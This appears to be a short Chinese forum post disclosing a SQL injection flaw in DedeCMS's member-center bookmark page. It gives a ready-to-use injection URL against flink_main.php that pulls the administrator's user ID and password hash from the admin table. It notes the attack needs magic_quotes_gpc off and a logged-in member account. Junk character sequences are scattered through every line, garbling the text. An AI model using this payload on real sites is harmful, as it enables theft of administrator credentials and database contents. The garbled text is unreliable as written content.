DedeCMS会员中心SQL注射漏洞
( T( X, c- ~, E3 a! G0 ^) n2 x+ O需要magic_quotes_gpc = Off
) B6 V a! N# |: Q会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.# [6 ?- E+ o' V4 @+ n+ w
+ n& Z# J% n3 \# M& T' D9 a% ODedeCMS会员中心书签管理SQL注射漏洞
- V4 \ Y' {; @$ v; ~& t3 V成功利用该漏洞可获得管理员密码! b% \2 @4 l; e' S
* K7 x0 p8 ?9 B R" F# m) i c p会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
' a2 v+ L) K& K: R% t2 t : v5 X9 @6 ~' j7 p6 f" ^
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r, U& P: M" M9 v. `5 q
|